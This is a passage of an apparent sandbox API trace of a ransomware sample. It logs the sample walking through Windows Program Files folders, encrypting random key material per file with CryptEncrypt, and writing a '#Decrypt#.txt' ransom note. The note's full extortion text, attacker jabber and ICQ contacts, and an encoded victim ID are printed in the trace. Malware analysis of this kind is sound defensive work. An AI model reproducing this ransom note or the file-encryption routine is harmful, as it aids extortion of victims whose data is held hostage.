lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.843] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f4b9306, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f4b9306, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff1c74f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1917, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whitemask1047.png", cAlternateFileName="")) returned 1 [0251.843] lstrcmpiW (lpString1="whitemask1047.png", lpString2="Windows") returned -1 [0251.843] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png") returned 81 [0251.843] StrStrIW (lpFirst="whitemask1047.png", lpSrch=".horseleader") returned 0x0 [0251.843] lstrcmpW (lpString1="whitemask1047.png", lpString2="#Decrypt#.txt") returned 1 [0251.843] lstrcmpW (lpString1="whitemask1047.png", lpString2="_uninstalling_.png") returned 1 [0251.843] lstrlenW (lpString=".testttjffg") returned 11 [0251.843] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png", lpSrch=".testttjffg") returned 0x0 [0251.843] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.843] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitemask1047.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.844] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f46d04c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f46d04c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x296fa, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whitevignette1047.png", cAlternateFileName="")) returned 1 [0251.844] lstrcmpiW (lpString1="whitevignette1047.png", lpString2="Windows") returned -1 [0251.844] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png") returned 85 [0251.844] StrStrIW (lpFirst="whitevignette1047.png", lpSrch=".horseleader") returned 0x0 [0251.844] lstrcmpW (lpString1="whitevignette1047.png", lpString2="#Decrypt#.txt") returned 1 [0251.844] lstrcmpW (lpString1="whitevignette1047.png", lpString2="_uninstalling_.png") returned 1 [0251.844] lstrlenW (lpString=".testttjffg") returned 11 [0251.844] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png", lpSrch=".testttjffg") returned 0x0 [0251.844] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.844] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitevignette1047.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.845] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f46d04c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f46d04c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x296fa, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whitevignette1047.png", cAlternateFileName="")) returned 0 [0251.845] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.846] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\#Decrypt#.txt") returned 77 [0251.846] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.847] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.847] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.849] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.849] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.849] CloseHandle (hObject=0x158) returned 1 [0251.849] GetProcessHeap () returned 0x780000 [0251.849] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.849] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Sports", cAlternateFileName="")) returned 1 [0251.849] lstrcmpiW (lpString1="Sports", lpString2="Windows") returned -1 [0251.849] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 54 [0251.849] lstrcmpW (lpString1="Sports", lpString2=".") returned 1 [0251.849] lstrcmpW (lpString1="Sports", lpString2="..") returned 1 [0251.850] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.850] GetProcessHeap () returned 0x780000 [0251.850] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.850] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*") returned 56 [0251.850] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.852] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.852] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\.") returned 56 [0251.852] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.852] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.852] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.852] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\..") returned 57 [0251.852] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.853] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.853] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ead378, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ead378, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb5e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="CircleSubpicture.png", cAlternateFileName="")) returned 1 [0251.853] lstrcmpiW (lpString1="CircleSubpicture.png", lpString2="Windows") returned -1 [0251.853] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png") returned 75 [0251.853] StrStrIW (lpFirst="CircleSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.853] lstrcmpW (lpString1="CircleSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.853] lstrcmpW (lpString1="CircleSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.853] lstrlenW (lpString=".testttjffg") returned 11 [0251.853] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.853] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.853] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.853] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\circlesubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.853] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ed34d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ed34d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x120d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="GoldRing.png", cAlternateFileName="")) returned 1 [0251.854] lstrcmpiW (lpString1="GoldRing.png", lpString2="Windows") returned -1 [0251.854] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png") returned 67 [0251.854] StrStrIW (lpFirst="GoldRing.png", lpSrch=".horseleader") returned 0x0 [0251.854] lstrcmpW (lpString1="GoldRing.png", lpString2="#Decrypt#.txt") returned 1 [0251.854] lstrcmpW (lpString1="GoldRing.png", lpString2="_uninstalling_.png") returned 1 [0251.854] lstrlenW (lpString=".testttjffg") returned 11 [0251.854] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png", lpSrch=".testttjffg") returned 0x0 [0251.854] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.854] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\goldring.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.855] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71338a7f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71338a7f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6d3c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="highlight.png", cAlternateFileName="")) returned 1 [0251.855] lstrcmpiW (lpString1="highlight.png", lpString2="Windows") returned -1 [0251.855] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png") returned 68 [0251.855] StrStrIW (lpFirst="highlight.png", lpSrch=".horseleader") returned 0x0 [0251.855] lstrcmpW (lpString1="highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.856] lstrcmpW (lpString1="highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.856] lstrlenW (lpString=".testttjffg") returned 11 [0251.856] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.856] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.856] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.856] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ef9632, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ef9632, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xba2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationButtonSubpicture.png", cAlternateFileName="")) returned 1 [0251.856] lstrcmpiW (lpString1="NavigationButtonSubpicture.png", lpString2="Windows") returned -1 [0251.856] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png") returned 85 [0251.856] StrStrIW (lpFirst="NavigationButtonSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.856] lstrcmpW (lpString1="NavigationButtonSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.857] lstrcmpW (lpString1="NavigationButtonSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.857] lstrlenW (lpString=".testttjffg") returned 11 [0251.857] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.857] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.857] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.857] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.857] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ef9632, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ef9632, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xee0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NextMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.857] lstrcmpiW (lpString1="NextMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.857] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png") returned 77 [0251.857] StrStrIW (lpFirst="NextMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.858] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.858] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.858] lstrlenW (lpString=".testttjffg") returned 11 [0251.858] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.858] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.858] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.858] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.858] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f1f78f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f1f78f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xee2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="ParentMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.858] lstrcmpiW (lpString1="ParentMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.858] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png") returned 79 [0251.859] StrStrIW (lpFirst="ParentMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.859] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.859] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.859] lstrlenW (lpString=".testttjffg") returned 11 [0251.859] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.859] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.859] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.859] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.860] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f1f78f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f1f78f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xeeb, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="PreviousMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.860] lstrcmpiW (lpString1="PreviousMenuButtonIcon.png", 